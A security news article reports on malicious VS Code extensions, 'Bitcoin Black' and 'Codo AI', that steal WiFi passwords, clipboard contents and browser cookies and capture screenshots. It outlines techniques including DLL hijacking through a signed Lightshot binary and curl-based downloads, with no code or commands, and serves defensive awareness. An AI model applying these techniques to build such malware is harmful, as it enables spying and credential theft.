Malicious VS Code on Microsoft Registry Captures Your Screen and Steals Your WiFi Passwords

Cybercriminals are increasingly weaponizing developer environments, as seen in a newly discovered malware campaign infiltrating the Visual Studio Code Marketplace.

Unlike typical extensions that simply harvest credentials or mine cryptocurrency, this sophisticated attack actively captures screenshots of a victim’s desktop, effectively spying on their code, private emails, and communication tools like Slack.

The malware is delivered through two seemingly legitimate extensions: “Bitcoin Black,” a dark theme, and “Codo AI,” a functioning coding assistant.

Both originate from the same publisher, “BigBlack,” and employ social engineering tactics to gain the trust of unsuspecting users before delivering their payload.

Once installed, these extensions initiate a series of malicious activities that go far beyond standard data theft. They are designed to harvest clipboard contents, list running processes, and exfiltrate stored WiFi passwords from the infected machine.

The impact is severe, as the malware hijacks browser sessions by launching Chrome and Edge in headless mode, allowing attackers to steal session cookies and bypass authentication protections.

This level of intrusion turns a developer’s workstation into a fully compromised surveillance node, exposing not just the individual but their entire organization’s intellectual property and network access details.

Koi security analysts identified this threat after analyzing the behavioral patterns of the “Bitcoin Black” and “Codo AI” extensions.

Their research highlighted the attacker’s evolution from complex PowerShell scripts to more streamlined execution methods.

Delivery mechanism

By tracking the malware’s versions, the researchers observed that the threat actor simplified their delivery mechanism to improve reliability, shifting from password-protected ZIP files to direct downloads using native system tools such as curl.

This persistence and adaptability signal a determined adversary focused on refining their tradecraft for maximum efficiency.

A key component of this attack is DLL hijacking, which is used to evade detection and establish persistence. The malware downloads a legitimate, signed executable of the popular screenshot tool known as “Lightshot” along with a malicious DLL file.

When the signed executable runs, it automatically loads the attacker’s DLL instead of the genuine one, a technique that often bypasses security filters that whitelist known binaries.

The malicious code then creates a staging directory in the user’s AppData folder and signals its presence using a unique mutex named “COOL_SCREENSHOT_MUTEX_YARRR” to prevent multiple infections.

This clever disguise allows the infostealer to operate covertly while exfiltrating sensitive data to a command-and-control server.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.